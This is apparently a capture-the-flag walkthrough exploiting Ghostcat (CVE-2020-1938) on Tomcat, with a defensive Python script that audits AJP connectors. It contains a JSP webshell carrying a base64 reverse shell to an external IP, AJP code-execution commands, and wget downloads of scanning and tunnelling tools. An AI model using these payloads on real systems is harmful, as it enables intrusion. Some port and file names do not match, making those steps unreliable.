春秋云境 Spoofing
flag1
Topic tested: CNVD-2020-10487 (CVE-2020-1938)
```
fscan.exe -h 39.99.146.129
```

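The scan finds an admin backend.

It turns out to be front-end pages only, so scan it with dirsearch.
This shows the server is Tomcat 9.0.30.

A direct search turns up a vulnerability, CNVD-2020-10487 (CVE-2020-1938). First use the tool below to read a file:
https://github.com/00theway/Ghostcat-CNVD-2020-10487
```
python ajpShooter.py http://39.99.146.129:8080/ 8009 /WEB-INF/web.xml read
```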
A file upload feature turns up:
```
http://39.99.146.129:8080/UploadServlet
```
Upload a reverse-shell webshell:
```
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMjAwLjM5LjE5My81MDAwIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>
```
The upload returns the path:
```
/upload/f33d8d3ab73df2e78d949cb4584d29ba/20251016094954432.txt
```

Then use the same tool again for code execution:
```
python ajpShooter.py http://39.99.146.129:8080/ 8009 /upload/f33d8d3ab73df2e78d949cb4584d29ba/20251016094954432.txt eval
```

With command execution, just grab the flag.
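The chain above depends on an AJP connector on port 8009 that is reachable off-host, needs no secret, and runs on Tomcat 9.0.30. The following added example (not part of the original writeup; the function names and both sample configs are constructed for illustration) audits a `server.xml` for exactly those conditions.

```python
import xml.etree.ElementTree as ET

# First fixed release per branch for CVE-2020-1938 (7.0.100, 8.5.51, 9.0.31).
FIXED = {(7, 0): 100, (8, 5): 51, (9, 0): 31}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed sample configs, not taken from the target in this writeup.
WEAK = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""
HARDENED = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="CONSTRUCTED-PLACEHOLDER"/>
</Service></Server>"""

def version_is_vulnerable(version):
    """True if a numeric x.y.z Tomcat version predates the fix for its branch."""
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    fixed_patch = FIXED.get((major, minor))
    return fixed_patch is not None and patch < fixed_patch

def audit_ajp(server_xml, version):
    """Return findings for every active (non-commented) AJP connector."""
    findings = []
    patched = not version_is_vulnerable(version)
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if "ajp" not in conn.get("protocol", "").lower():
            continue
        port = conn.get("port", "?")
        # Pre-fix releases listen on all interfaces by default; fixed ones on loopback.
        addr = conn.get("address", "127.0.0.1" if patched else "0.0.0.0")
        # "requiredSecret" is the older name of the "secret" attribute.
        secret = conn.get("secret") or conn.get("requiredSecret")
        if not patched:
            findings.append(f"AJP port {port}: Tomcat {version} predates the CVE-2020-1938 fix")
        if addr not in LOOPBACK:
            findings.append(f"AJP port {port}: bound to {addr}, reachable off-host")
        if not secret:
            findings.append(f"AJP port {port}: no shared secret configured")
    return findings

if __name__ == "__main__":
    for name, cfg, ver in (("weak", WEAK, "9.0.30"), ("hardened", HARDENED, "9.0.31")):
        print(name, audit_ajp(cfg, ver) or "no AJP findings")
```

If AJP is not needed at all, removing or commenting out the connector is the simpler fix; the parser skips commented-out connectors, so such a config produces no findings.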
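flag2
First start a Python HTTP server on the VPS so the compromised host can download fscan and chisel, which are used for internal network scanning and for setting up a proxy.
```
python3 -m http.server 5000
```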

```
wget http://101.200.39.193:8080/fscan
wget http://101.200.39.193:8080/linux_x64_admin
chmod +x fscan
chmod +x chisel
```